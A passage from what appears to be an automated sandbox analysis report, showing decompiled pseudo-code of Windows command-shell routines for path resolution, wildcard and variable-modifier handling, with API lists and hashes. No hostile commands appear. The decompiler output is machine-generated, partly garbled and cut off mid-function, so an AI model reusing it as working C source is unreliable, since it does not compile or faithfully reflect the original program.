                                                      • Instruction Fuzzy Hash: 03A120B195D612EEEF709FA0CD999EA3FBEEF06351B124026D509CA942E7708D4CCB11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 69%
                                                      			E4A73B8B1(void* __edx, void* __eflags, long _a4, intOrPtr _a8, char _a12, signed int _a16, intOrPtr _a20) {
                                                      				signed int _v8;
                                                      				short _v12;
                                                      				short _v14;
                                                      				char _v16;
                                                      				short _v536;
                                                      				short _v1056;
                                                      				short _v1576;
                                                      				char _v1577;
                                                      				char _v1578;
                                                      				char _v1584;
                                                      				signed int _v1588;
                                                      				signed int _v1592;
                                                      				signed int _v1596;
                                                      				signed int _v1600;
                                                      				intOrPtr _v1604;
                                                      				char _v1608;
                                                      				intOrPtr _v1612;
                                                      				intOrPtr _v1616;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t97;
                                                      				short _t102;
                                                      				short _t103;
                                                      				long _t105;
                                                      				intOrPtr _t111;
                                                      				intOrPtr _t113;
                                                      				intOrPtr _t122;
                                                      				signed int _t126;
                                                      				intOrPtr* _t137;
                                                      				long _t143;
                                                      				signed int _t144;
                                                      				intOrPtr* _t146;
                                                      				signed int _t150;
                                                      				short* _t151;
                                                      				WCHAR* _t153;
                                                      				intOrPtr* _t164;
                                                      				long _t170;
                                                      				intOrPtr* _t174;
                                                      				long _t189;
                                                      				void* _t196;
                                                      				signed int _t197;
                                                      				void* _t198;
                                                      				intOrPtr _t215;
                                                      				void* _t217;
                                                      				intOrPtr _t222;
                                                      				signed int _t230;
                                                      				long _t231;
                                                      				signed int _t232;
                                                      
                                                      				_t97 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t97 ^ _t232;
                                                      				_t231 = _a4;
                                                      				_v1612 = _a8;
                                                      				_v1592 = _a16;
                                                      				_t197 = E4A73B512(_t196, __edx, _t231, 0x20);
                                                      				_t102 = 0x2a;
                                                      				_v16 = _t102;
                                                      				_t103 = 0x3f;
                                                      				_v14 = _t103;
                                                      				_v12 = 0;
                                                      				_t105 = _t231;
                                                      				_t198 = _t105 + 2;
                                                      				do {
                                                      					_t222 =  *_t105;
                                                      					_t105 = _t105 + 2;
                                                      				} while (_t222 != 0);
                                                      				E4A731996(_t231,  &_v16);
                                                      				asm("sbb edi, edi");
                                                      				_t230 =  ~(_t105 - _t198 >> 1);
                                                      				_v1600 = _t230;
                                                      				if(_t197 == 0xffffffff) {
                                                      					if(_a20 == 0) {
                                                      						L5:
                                                      						_v1578 = 2;
                                                      						L6:
                                                      						_v1577 = 1;
                                                      						L7:
                                                      						_t197 = _v1592;
                                                      						_t111 = 0x20;
                                                      						_v1604 = _t111;
                                                      						if(E4A733117(_t231, _t111,  *(_t197 + 0x18),  &_v1584) == 0) {
                                                      							_t113 = 0x10;
                                                      							_v1604 = _t113;
                                                      							if((E4A733117(_t231, _t113,  *(_t197 + 0x18),  &_v1584) & 0x000000ff) != 0) {
                                                      								goto L8;
                                                      							}
                                                      							_t189 =  *0x4a754128; // 0x0
                                                      							if(_t189 != 0x12) {
                                                      								if(_t230 != 0) {
                                                      									L37:
                                                      									_t189 = 0x234d;
                                                      									L40:
                                                      									_push(_t189);
                                                      									L41:
                                                      									L4A74DF02(_t207, _t222);
                                                      									L42:
                                                      									if(_a20 == 0) {
                                                      										_push(0x40002720);
                                                      										goto L41;
                                                      									}
                                                      									_v1578 = 1;
                                                      									_v1577 = 0;
                                                      									goto L7;
                                                      								}
                                                      								goto L40;
                                                      							}
                                                      							_t189 = 2;
                                                      							goto L40;
                                                      						}
                                                      						L8:
                                                      						_v1588 = _v1588 & 0x00000000;
                                                      						_v1592 = _v1592 & 0x00000000;
                                                      						_t231 = 0x104;
                                                      						E4A73185A( &_v1056, 0x104, 0x104);
                                                      						_t122 = E4A732148( &_v1056,  *0x4a770664 & 0x0000ffff) + 2;
                                                      						_v1616 = _t122;
                                                      						while( *0x4a7541b4 == 0) {
                                                      							_t207 = _t122 -  &_v1056 >> 1;
                                                      							E4A73185A(_t122, _t231 - (_t122 -  &_v1056 >> 1),  &(( *(_t197 + 0x18))[0x2c]));
                                                      							E4A73185A( &_v536, _t231, _v1612);
                                                      							if(_v1578 == 1) {
                                                      								E4A73185A(E4A732148( &_v536,  *0x4a770664 & 0x0000ffff) + 2, _t231 - (E4A732148( &_v536,  *0x4a770664 & 0x0000ffff) + 2 -  &_v536 >> 1),  &(( *(_t197 + 0x18))[0x2c]));
                                                      								_t137 =  &_v536;
                                                      								_t207 = _t137 + 2;
                                                      								do {
                                                      									_t222 =  *_t137;
                                                      									_t137 = _t137 + 2;
                                                      								} while (_t222 != 0);
                                                      								if(_t137 - _t207 >> 1 <= _t231) {
                                                      									goto L11;
                                                      								}
                                                      								E4A732F5C(_v1584);
                                                      								E4A73963C();
                                                      								_push(0x232e);
                                                      								goto L41;
                                                      							}
                                                      							L11:
                                                      							_t143 = GetFullPathNameW( &_v536, _t231,  &_v1576, 0);
                                                      							if(_t143 == 0 || _t143 >= _t231) {
                                                      								L33:
                                                      								_t144 = GetLastError();
                                                      								_t230 = _t144;
                                                      								if(_t230 != 0xb7) {
                                                      									if(_t230 == 1) {
                                                      										_t230 = 0x40002730;
                                                      									}
                                                      								} else {
                                                      									_t230 = 0x234d;
                                                      								}
                                                      								goto L59;
                                                      							} else {
                                                      								_t164 =  &_v1576;
                                                      								_t222 = _t164 + 2;
                                                      								do {
                                                      									_t207 =  *_t164;
                                                      									_t164 = _t164 + 2;
                                                      								} while (_t207 != 0);
                                                      								_t230 = _t164 - _t222 >> 1;
                                                      								_t170 = GetFullPathNameW( &_v1056, _t231,  &_v1576, 0);
                                                      								if(_t170 == 0 || _t170 >= _t231) {
                                                      									goto L33;
                                                      								} else {
                                                      									if(E4A73BBA4(_t230,  &_v1576, _t231,  &_v1596) == 0) {
                                                      										L66:
                                                      										if(E4A7395F8( *(_t197 + 0x18), _v1604, _v1584) == 0) {
                                                      											L25:
                                                      											E4A732F5C(_v1584);
                                                      											E4A73963C();
                                                      											_push(_v1588);
                                                      											_push("%9d");
                                                      											if(( *( *(_t197 + 0x18)) & 0x00000010) != 0) {
                                                      												_push(E4A739A2C());
                                                      												_push(1);
                                                      												_push(0x236d);
                                                      											} else {
                                                      												_push(E4A739A2C());
                                                      												_push(1);
                                                      												_push(0x236e);
                                                      											}
                                                      											E4A7399E1(_t217);
                                                      											_t126 = 0 | _v1592 != 0x00000000;
                                                      											L28:
                                                      											return E4A7313A9(_t126, _t197, _v8 ^ _t232, _t222, _t230, _t231);
                                                      										}
                                                      										_t122 = _v1616;
                                                      										continue;
                                                      									}
                                                      									_t174 =  &_v1576;
                                                      									_t222 = _t174 + 2;
                                                      									do {
                                                      										_t207 =  *_t174;
                                                      										_t174 = _t174 + 2;
                                                      									} while (_t207 != 0);
                                                      									_v1596 = _v1596 - (_t174 - _t222 >> 1);
                                                      									_t230 = _t230 + _v1596;
                                                      									if(_t230 > _t231) {
                                                      										_t230 = 0xce;
                                                      										L59:
                                                      										_v1592 = _t230;
                                                      										if(_v1600 != 0) {
                                                      											E4A7358F3(L"%s\r\n",  &_v1056);
                                                      											_pop(_t207);
                                                      										}
                                                      										_push(0);
                                                      										_push(_t230);
                                                      										E4A736D44(_t207);
                                                      										_t146 =  &_v536;
                                                      										_t222 = _t146 + 2;
                                                      										do {
                                                      											_t215 =  *_t146;
                                                      											_t146 = _t146 + 2;
                                                      										} while (_t215 != 0);
                                                      										_t150 = (_t146 - _t222 >> 1) - 1;
                                                      										_v1596 = _t150;
                                                      										_t151 = _t232 + _t150 * 2 - 0x214;
                                                      										if( *_t151 == 0x2e) {
                                                      											 *_t151 = 0;
                                                      										}
                                                      										_t153 =  &_v1056;
                                                      										__imp___wcsicmp( &_v536);
                                                      										_t217 = _t153;
                                                      										if(_t153 != 0) {
                                                      											L24:
                                                      											if(_v1577 == 0) {
                                                      												goto L66;
                                                      											}
                                                      										} else {
                                                      										}
                                                      										goto L25;
                                                      									}
                                                      									if(E4A73BB60( &_v1056,  &_v536,  &_a12,  &_v1608) == 0) {
                                                      										goto L33;
                                                      									}
                                                      									if(_v1608 != 0) {
                                                      										_v1588 = _v1588 + 1;
                                                      										if(_v1600 != 0) {
                                                      											E4A7358F3(L"%s\r\n",  &_v1056);
                                                      											_pop(_t217);
                                                      										}
                                                      									}
                                                      									goto L24;
                                                      								}
                                                      							}
                                                      						}
                                                      						E4A732F5C(_v1584);
                                                      						E4A73963C();
                                                      						_t126 = 1;
                                                      						goto L28;
                                                      					}
                                                      					if(E4A73BB60(_t231, _v1612,  &_a12,  &_v1608) == 0) {
                                                      						_t189 = GetLastError();
                                                      						if(_t189 != 0xb7) {
                                                      							if(_t189 == 1) {
                                                      								_t189 = 0x40002730;
                                                      							}
                                                      							goto L40;
                                                      						}
                                                      						goto L37;
                                                      					}
                                                      					E4A73963C();
                                                      					E4A7399E1(_t198, 0x236d, 1, E4A739A2C("%9d", 1));
                                                      					_t126 = 0;
                                                      					goto L28;
                                                      				}
                                                      				if(_t197 > 1) {
                                                      					goto L42;
                                                      				}
                                                      				_v1578 = 1;
                                                      				if(_a20 != 0) {
                                                      					goto L6;
                                                      				}
                                                      				goto L5;
                                                      			}

                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,00000000,00000002,00000104,?,?,00000000,?,00000104,?,00000002,00000104,?,?), ref: 4A73BA15
                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,00000000,?,00000000), ref: 4A73BA55
                                                      • GetLastError.KERNEL32(?,00000000), ref: 4A740E67
                                                      • _wcsicmp.MSVCRT ref: 4A745FF5
                                                        • Part of subcall function 4A73BBA4: GetFileAttributesW.KERNEL32(00000000,00000104,?), ref: 4A73BC05
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: FullNamePath$AttributesErrorFileLast_wcsicmp
                                                      • String ID: %9d$%s
                                                      • API String ID: 133037402-3662383364
                                                      • Opcode ID: 2dd081fc919da0d8457b62fe0c510f9c55f4181b4ccae45165aba222f943843a
                                                      • Instruction ID: 266ab0d60b5ff13bb4020c8f04660156d65c25db4a948304ba81217554e244cd
                                                      • Opcode Fuzzy Hash: 2dd081fc919da0d8457b62fe0c510f9c55f4181b4ccae45165aba222f943843a
                                                      • Instruction Fuzzy Hash: 5FD1E571909529AADB31DB64CC88BEE7BB9EF98310F0100D5E509DB082DB759F9CCB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 67%
                                                      			E4A737607(void* __eax, void* __ebx, signed int __edx, WCHAR* __edi, WCHAR* __esi) {
                                                      				signed int _t169;
                                                      				WCHAR* _t172;
                                                      				WCHAR* _t173;
                                                      				long _t188;
                                                      				WCHAR* _t195;
                                                      				WCHAR* _t198;
                                                      				signed char _t199;
                                                      				signed int _t206;
                                                      				short _t229;
                                                      				short _t248;
                                                      				short _t252;
                                                      				short* _t253;
                                                      				WCHAR* _t256;
                                                      				short* _t261;
                                                      				WCHAR* _t262;
                                                      				WCHAR* _t270;
                                                      				void* _t272;
                                                      				WCHAR* _t273;
                                                      				void* _t278;
                                                      				short _t303;
                                                      				signed int _t314;
                                                      				signed int _t319;
                                                      				WCHAR* _t320;
                                                      				void* _t321;
                                                      				void* _t325;
                                                      				WCHAR* _t326;
                                                      				WCHAR* _t330;
                                                      				void* _t331;
                                                      				WCHAR* _t339;
                                                      				WCHAR* _t342;
                                                      				wchar_t* _t347;
                                                      				signed int _t349;
                                                      				void* _t351;
                                                      
                                                      				L0:
                                                      				while(1) {
                                                      					L0:
                                                      					_t330 = __esi;
                                                      					_t320 = __edi;
                                                      					_t317 = __edx;
                                                      					if(__eax == 0x24) {
                                                      						goto L19;
                                                      					}
                                                      					L9:
                                                      					 *__ebx(__eax) = __ax & 0x0000ffff;
                                                      					__eax =  *__edi(L"fdpnxsatz", __ax & 0x0000ffff);
                                                      					__esp = __esp + 0xc;
                                                      					__eflags = __eax;
                                                      					if(__eax == 0) {
                                                      						goto L19;
                                                      					}
                                                      					L10:
                                                      					__eax =  *__esi & 0x0000ffff;
                                                      					__eax =  *__edi( *((intOrPtr*)(__ebp - 0x840)),  *__esi & 0x0000ffff);
                                                      					_pop(__ecx);
                                                      					_pop(__ecx);
                                                      					__eflags = __eax;
                                                      					if(__eax != 0) {
                                                      						__eax =  *(__ebp - 0x828);
                                                      						 *(__ebp - 0x848) = __esi;
                                                      						 *(__ebp - 0x834) =  *(__ebp - 0x828);
                                                      					}
                                                      					__eax =  *__esi & 0x0000ffff;
                                                      					__eax =  *__ebx( *__esi & 0x0000ffff);
                                                      					__eax = __ax & 0x0000ffff;
                                                      					__eflags = __eax - 0x70;
                                                      					_pop(__ecx);
                                                      					if(__eflags > 0) {
                                                      						L59:
                                                      						__eax = __eax - 0x73;
                                                      						__eflags = __eax;
                                                      						if(__eax == 0) {
                                                      							L77:
                                                      							 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00008020;
                                                      							goto L18;
                                                      						}
                                                      						L60:
                                                      						__eax = __eax - 1;
                                                      						__eflags = __eax;
                                                      						if(__eax == 0) {
                                                      							L76:
                                                      							 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00004200;
                                                      							goto L18;
                                                      						}
                                                      						L61:
                                                      						__eax = __eax - 4;
                                                      						__eflags = __eax;
                                                      						if(__eax != 0) {
                                                      							L74:
                                                      							__eax = __eax - 1;
                                                      							__eax = __eax - 1;
                                                      							__eflags = __eax;
                                                      							if(__eax != 0) {
                                                      								goto L67;
                                                      							}
                                                      							L75:
                                                      							 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00004400;
                                                      							goto L18;
                                                      						}
                                                      						L62:
                                                      						 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00008010;
                                                      						goto L18;
                                                      					} else {
                                                      						L12:
                                                      						if(__eflags == 0) {
                                                      							L57:
                                                      							 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00008004;
                                                      							L18:
                                                      							_t330 =  &(_t330[1]);
                                                      							__eflags =  *_t330 & 0x0000ffff;
                                                      							if(( *_t330 & 0x0000ffff) != 0) {
                                                      								continue;
                                                      							}
                                                      							goto L19;
                                                      						}
                                                      						L13:
                                                      						__eax = __eax - 0x61;
                                                      						__eflags = __eax;
                                                      						if(__eax == 0) {
                                                      							L73:
                                                      							 *(_t349 - 0x828) =  *(_t349 - 0x828) | 0x00004100;
                                                      							goto L18;
                                                      						}
                                                      						L14:
                                                      						__eax = __eax - 3;
                                                      						__eflags = __eax;
                                                      						if(__eax == 0) {
                                                      							L56:
                                                      							 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00008002;
                                                      							goto L18;
                                                      						}
                                                      						L15:
                                                      						__eax = __eax - 1;
                                                      						__eax = __eax - 1;
                                                      						__eflags = __eax;
                                                      						if(__eax == 0) {
                                                      							L65:
                                                      							 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00008001;
                                                      							goto L18;
                                                      						}
                                                      						L16:
                                                      						__eax = __eax - 8;
                                                      						__eflags = __eax;
                                                      						if(__eax != 0) {
                                                      							L67:
                                                      							__eflags =  *(_t349 - 0x830);
                                                      							if( *(_t349 - 0x830) == 0) {
                                                      								L69:
                                                      								_t173 = 0;
                                                      								L3:
                                                      								_pop(_t321);
                                                      								_pop(_t331);
                                                      								_pop(_t272);
                                                      								return E4A7313A9(_t173, _t272,  *(_t349 - 4) ^ _t349, _t317, _t321, _t331);
                                                      							}
                                                      							L68:
                                                      							E4A736D44(_t278, 0x400023a8, 1,  *((intOrPtr*)(_t349 - 0x844)));
                                                      							_t351 = _t351 + 0xc;
                                                      							L83:
                                                      							__imp__longjmp( *(_t349 - 0x830), 0xffffffff);
                                                      							goto L73;
                                                      						} else {
                                                      							_t4 = __ebp - 0x828;
                                                      							 *_t4 =  *(__ebp - 0x828) | 0x00008008;
                                                      							__eflags =  *_t4;
                                                      							goto L18;
                                                      						}
                                                      					}
                                                      					L19:
                                                      					_t169 =  *_t330 & 0x0000ffff;
                                                      					 *(_t349 - 0x838) =  *(_t349 - 0x838) & 0x00000000;
                                                      					__eflags = _t169;
                                                      					if(_t169 == 0) {
                                                      						L63:
                                                      						_t330 =  *(_t349 - 0x848);
                                                      						 *(_t349 - 0x828) =  *(_t349 - 0x834);
                                                      						L22:
                                                      						_t172 =  *_t320( *((intOrPtr*)(_t349 - 0x840)),  *_t330 & 0x0000ffff);
                                                      						_pop(_t278);
                                                      						__eflags = _t172;
                                                      						if(_t172 == 0) {
                                                      							goto L67;
                                                      						}
                                                      						L23:
                                                      						_t320 =  *( *(_t349 - 0x83c) + (_t172 -  *((intOrPtr*)(_t349 - 0x840)) >> 1) * 4);
                                                      						__eflags = _t320;
                                                      						if(_t320 == 0) {
                                                      							L26:
                                                      							 *( *(_t349 - 0x84c)) = (_t330 -  *((intOrPtr*)(_t349 - 0x844)) + 2 >> 1) - 1;
                                                      							__eflags = _t320;
                                                      							if(_t320 == 0) {
                                                      								L4:
                                                      								__eflags =  *( *(_t349 - 0x84c));
                                                      								_t173 = E4A733AFC;
                                                      								if( *( *(_t349 - 0x84c)) == 0) {
                                                      									L2:
                                                      									_t173 = _t320;
                                                      								}
                                                      								goto L3;
                                                      							}
                                                      							L27:
                                                      							__eflags =  *_t320;
                                                      							if( *_t320 == 0) {
                                                      								L1:
                                                      								if(_t320 == 0) {
                                                      									goto L4;
                                                      								}
                                                      								goto L2;
                                                      							}
                                                      							L28:
                                                      							__eflags =  *(_t349 - 0x828) & 0x0000c000;
                                                      							if(( *(_t349 - 0x828) & 0x0000c000) == 0) {
                                                      								L58:
                                                      								_push(_t320);
                                                      								L49:
                                                      								_t320 = E4A7319D6();
                                                      								goto L1;
                                                      							}
                                                      							L29:
                                                      							 *(_t349 - 0x824) = 0;
                                                      							__eflags =  *(_t349 - 0x838);
                                                      							if( *(_t349 - 0x838) != 0) {
                                                      								L87:
                                                      								__eflags =  *(_t349 - 0x838) - 0xffffffff;
                                                      								if( *(_t349 - 0x838) == 0xffffffff) {
                                                      									L91:
                                                      									_t320 = 0;
                                                      									goto L31;
                                                      								}
                                                      								L88:
                                                      								_t256 = SearchPathW( *(_t349 - 0x838), _t320, 0, 0x208, _t349 - 0x824, _t349 - 0x82c);
                                                      								 *(_t349 - 0x850) = _t256;
                                                      								__eflags = _t256;
                                                      								if(_t256 == 0) {
                                                      									goto L91;
                                                      								}
                                                      								L89:
                                                      								__eflags =  *(_t349 - 0x828);
                                                      								if( *(_t349 - 0x828) == 0) {
                                                      									 *(_t349 - 0x828) =  *(_t349 - 0x828) | 0x00008001;
                                                      								}
                                                      								goto L31;
                                                      							} else {
                                                      								 *(_t349 - 0x850) = GetFullPathNameW(_t320, 0x208, _t349 - 0x824, _t349 - 0x82c);
                                                      								L31:
                                                      								 *(_t349 - 0x834) =  *(_t349 - 0x828) & 0x00000020;
                                                      								E4A736E47(_t349 - 0x824, 0x208,  *(_t349 - 0x828) & 0x00000020);
                                                      								_t188 = wcsrchr(_t349 - 0x824, 0x5c);
                                                      								 *(_t349 - 0x82c) = _t188;
                                                      								__eflags = _t188;
                                                      								if(_t188 == 0) {
                                                      									 *(_t349 - 0x82c) = wcsrchr(_t349 - 0x824, _t188);
                                                      								} else {
                                                      									_t29 = _t349 - 0x82c;
                                                      									 *_t29 =  &(( *(_t349 - 0x82c))[0]);
                                                      									__eflags =  *_t29;
                                                      								}
                                                      								__eflags =  *(_t349 - 0x850);
                                                      								if( *(_t349 - 0x850) == 0) {
                                                      									goto L1;
                                                      								} else {
                                                      									L34:
                                                      									 *(_t349 - 0x414) = 0;
                                                      									memset(_t349 - 0x412, 0, 0x40e);
                                                      									_t195 =  *(_t349 - 0x828) & 0x00004000;
                                                      									__eflags = _t195;
                                                      									_t339 = _t349 - 0x414;
                                                      									 *(_t349 - 0x83c) = _t195;
                                                      									_t325 = 0x207;
                                                      									if(_t195 != 0) {
                                                      										L93:
                                                      										_t198 = GetFileAttributesExW(_t349 - 0x824, 0, _t349 - 0x878);
                                                      										__eflags = _t198;
                                                      										if(_t198 == 0) {
                                                      											goto L35;
                                                      										}
                                                      										L94:
                                                      										__eflags =  *(_t349 - 0x828) & 0x00000100;
                                                      										if(( *(_t349 - 0x828) & 0x00000100) == 0) {
                                                      											L102:
                                                      											__eflags =  *(_t349 - 0x828) & 0x00000200;
                                                      											if(( *(_t349 - 0x828) & 0x00000200) != 0) {
                                                      												E4A742513(_t349 - 0x864, _t349 - 0x89c);
                                                      												__eflags = _t339 - _t349 - 0x414;
                                                      												if(_t339 != _t349 - 0x414) {
                                                      													__eflags = _t339 - _t349 - 0x414 >> 1 - _t325;
                                                      													if(_t339 - _t349 - 0x414 >> 1 < _t325) {
                                                      														_t252 = 0x20;
                                                      														 *_t339 = _t252;
                                                      														_t339 =  &(_t339[1]);
                                                      														__eflags = _t339;
                                                      													}
                                                      												}
                                                      												_t342 =  &(_t339[E4A74270D(_t349 - 0x89c, 0, _t339, 0x104 - (_t339 - _t349 - 0x414 >> 1))]);
                                                      												__eflags = _t342 - _t349 - 0x414;
                                                      												if(_t342 != _t349 - 0x414) {
                                                      													__eflags = _t342 - _t349 - 0x414 >> 1 - 0x207;
                                                      													if(_t342 - _t349 - 0x414 >> 1 < 0x207) {
                                                      														_t248 = 0x20;
                                                      														 *_t342 = _t248;
                                                      														_t342 =  &(_t342[1]);
                                                      														__eflags = _t342;
                                                      													}
                                                      												}
                                                      												__eflags = 0x104 - (_t342 - _t349 - 0x414 >> 1);
                                                      												_t339 =  &(_t342[E4A73D701(_t342, _t349 - 0x89c, 0, _t342, 0x104 - (_t342 - _t349 - 0x414 >> 1))]);
                                                      												_t325 = 0x207;
                                                      											}
                                                      											__eflags =  *(_t349 - 0x828) & 0x00000400;
                                                      											if(( *(_t349 - 0x828) & 0x00000400) != 0) {
                                                      												__eflags = _t339 - _t349 - 0x414;
                                                      												if(_t339 != _t349 - 0x414) {
                                                      													__eflags = _t339 - _t349 - 0x414 >> 1 - _t325;
                                                      													if(_t339 - _t349 - 0x414 >> 1 < _t325) {
                                                      														_t229 = 0x20;
                                                      														 *_t339 = _t229;
                                                      														_t339 =  &(_t339[1]);
                                                      														__eflags = _t339;
                                                      													}
                                                      												}
                                                      												 *((intOrPtr*)(_t349 - 0x854)) =  *((intOrPtr*)(_t349 - 0x858));
                                                      												 *(_t349 - 0x850) =  *(_t349 - 0x85c);
                                                      												_t339 =  &(_t339[E4A74292F(0, _t349 - 0x854, 0, _t339, 0x208 - (_t339 - _t349 - 0x414 >> 1))]);
                                                      											}
                                                      											goto L35;
                                                      										}
                                                      										L95:
                                                      										_t314 = 0;
                                                      										__eflags =  *0x4a77088c - _t314; // 0x64
                                                      										if(__eflags == 0) {
                                                      											goto L102;
                                                      										}
                                                      										L96:
                                                      										_t253 = 0x4a77088c;
                                                      										while(1) {
                                                      											L97:
                                                      											_t317 = _t314 >> 1;
                                                      											__eflags = _t314 >> 1 - _t325;
                                                      											if(_t314 >> 1 >= _t325) {
                                                      												goto L102;
                                                      											}
                                                      											L98:
                                                      											_t319 =  *(_t349 - 0x878);
                                                      											__eflags =  *(_t253 - 4) & _t319;
                                                      											if(( *(_t253 - 4) & _t319) == 0) {
                                                      												_t317 = 0x2d;
                                                      											} else {
                                                      												_t317 =  *_t253;
                                                      											}
                                                      											 *_t339 = _t317;
                                                      											_t339 =  &(_t339[1]);
                                                      											_t253 = _t253 + 8;
                                                      											_t314 = _t314 + 2;
                                                      											__eflags =  *_t253;
                                                      											if( *_t253 != 0) {
                                                      												continue;
                                                      											} else {
                                                      												goto L102;
                                                      											}
                                                      										}
                                                      										goto L102;
                                                      									}
                                                      									L35:
                                                      									_t199 =  *(_t349 - 0x828);
                                                      									__eflags = _t199 & 0x00008000;
                                                      									if((_t199 & 0x00008000) == 0) {
                                                      										L115:
                                                      										__eflags =  *(_t349 - 0x83c);
                                                      										if( *(_t349 - 0x83c) == 0) {
                                                      											goto L36;
                                                      										}
                                                      										L116:
                                                      										L48:
                                                      										_push(_t349 - 0x414);
                                                      										goto L49;
                                                      									}
                                                      									L36:
                                                      									__eflags = _t339 - _t349 - 0x414;
                                                      									if(_t339 != _t349 - 0x414) {
                                                      										_t317 = _t349 - 0x414;
                                                      										__eflags = _t339 - _t349 - 0x414 >> 1 - _t325;
                                                      										if(_t339 - _t349 - 0x414 >> 1 < _t325) {
                                                      											_t303 = 0x20;
                                                      											 *_t339 = _t303;
                                                      											_t339 =  &(_t339[1]);
                                                      										}
                                                      									}
                                                      									__eflags = _t199 & 0x00000001;
                                                      									if((_t199 & 0x00000001) != 0) {
                                                      										L47:
                                                      										__eflags = 0x208 - (_t339 - _t349 - 0x414 >> 1);
                                                      										E4A73185A(_t339, 0x208 - (_t339 - _t349 - 0x414 >> 1), _t349 - 0x824);
                                                      										goto L48;
                                                      									} else {
                                                      										L38:
                                                      										__eflags =  *(_t349 - 0x834);
                                                      										if( *(_t349 - 0x834) != 0) {
                                                      											L70:
                                                      											__eflags = _t199 & 0x0000001e;
                                                      											if((_t199 & 0x0000001e) != 0) {
                                                      												goto L39;
                                                      											}
                                                      											L71:
                                                      											goto L47;
                                                      										}
                                                      										L39:
                                                      										_t326 = _t349 - 0x820;
                                                      										__eflags = _t199 & 0x00000002;
                                                      										if((_t199 & 0x00000002) == 0) {
                                                      											E4A73185A(_t349 - 0x824, 0x208, _t326);
                                                      											_t48 = _t349 - 0x82c;
                                                      											 *_t48 =  *(_t349 - 0x82c) - 4;
                                                      											__eflags =  *_t48;
                                                      											_t326 = _t349 - 0x824;
                                                      										}
                                                      										L41:
                                                      										__eflags =  *(_t349 - 0x828) & 0x00000004;
                                                      										if(( *(_t349 - 0x828) & 0x00000004) == 0) {
                                                      											__eflags = 0x208 - (_t326 - _t349 - 0x824 >> 1);
                                                      											E4A73185A(_t326, 0x208 - (_t326 - _t349 - 0x824 >> 1),  *(_t349 - 0x82c));
                                                      											 *(_t349 - 0x82c) = _t326;
                                                      										}
                                                      										L43:
                                                      										_t206 = wcsrchr( *(_t349 - 0x82c), 0x2e);
                                                      										__eflags = _t206;
                                                      										if(_t206 == 0) {
                                                      											 *(_t349 - 0x83c) =  *(_t349 - 0x83c) & _t206;
                                                      											_t206 = _t349 - 0x83c;
                                                      										}
                                                      										__eflags =  *(_t349 - 0x828) & 0x00000010;
                                                      										if(( *(_t349 - 0x828) & 0x00000010) == 0) {
                                                      											__eflags = 0;
                                                      											 *_t206 = 0;
                                                      										}
                                                      										__eflags =  *(_t349 - 0x828) & 0x00000008;
                                                      										if(( *(_t349 - 0x828) & 0x00000008) == 0) {
                                                      											E4A73185A( *(_t349 - 0x82c), 0x208 - ( *(_t349 - 0x82c) - _t349 - 0x824 >> 1), _t206);
                                                      										}
                                                      										goto L47;
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						L24:
                                                      						__eflags =  *_t320 - 0x22;
                                                      						if( *_t320 == 0x22) {
                                                      							L6:
                                                      							_t320 = E4A7319D6( &(_t320[1]));
                                                      							__eflags = _t320;
                                                      							if(_t320 == 0) {
                                                      								L80:
                                                      								__eflags =  *(_t349 - 0x830);
                                                      								if( *(_t349 - 0x830) != 0) {
                                                      									goto L83;
                                                      								}
                                                      								L81:
                                                      								goto L69;
                                                      							} else {
                                                      								_t261 = E4A732ED1(_t320);
                                                      								__eflags =  *_t261 - 0x22;
                                                      								if( *_t261 == 0x22) {
                                                      									 *_t261 = 0;
                                                      								}
                                                      								goto L26;
                                                      							}
                                                      						}
                                                      						L25:
                                                      						__eflags =  *_t330 - 0x30;
                                                      						if( *_t330 == 0x30) {
                                                      							_t262 =  *0x4a7540b4; // 0x0
                                                      							__eflags = _t262;
                                                      							if(_t262 != 0) {
                                                      								__eflags = _t262[0x46] - _t320;
                                                      								if(_t262[0x46] == _t320) {
                                                      									__eflags =  *(_t349 - 0x838);
                                                      									if( *(_t349 - 0x838) == 0) {
                                                      										__eflags =  *(_t349 - 0x828) & 0x0000c000;
                                                      										if(( *(_t349 - 0x828) & 0x0000c000) != 0) {
                                                      											_t320 =  *_t262;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L26;
                                                      					}
                                                      					L20:
                                                      					__eflags = _t169 - 0x24;
                                                      					if(_t169 == 0x24) {
                                                      						L78:
                                                      						_t347 =  &(_t330[1]);
                                                      						 *(_t349 - 0x834) = _t347;
                                                      						_t330 = wcschr(_t347, 0x3a);
                                                      						_pop(_t278);
                                                      						__eflags = _t330;
                                                      						if(_t330 == 0) {
                                                      							goto L67;
                                                      						}
                                                      						L79:
                                                      						_t320 = (_t330 -  *(_t349 - 0x834) >> 1) + 1;
                                                      						_t273 = E4A731896(_t320 + _t320);
                                                      						__eflags = _t273;
                                                      						if(_t273 != 0) {
                                                      							L84:
                                                      							E4A734B3D(_t273, _t320,  *(_t349 - 0x834), _t320 - 1);
                                                      							 *(_t349 - 0x838) = E4A73321B(_t278, _t273);
                                                      							E4A73142E(_t273);
                                                      							__eflags =  *(_t349 - 0x838);
                                                      							if( *(_t349 - 0x838) == 0) {
                                                      								_t113 = _t349 - 0x838;
                                                      								 *_t113 =  *(_t349 - 0x838) | 0xffffffff;
                                                      								__eflags =  *_t113;
                                                      							}
                                                      							_t320 = wcsrchr;
                                                      							_t330 =  &(_t330[1]);
                                                      							 *(_t349 - 0x828) =  *(_t349 - 0x828) | 0x00008000;
                                                      							goto L22;
                                                      						}
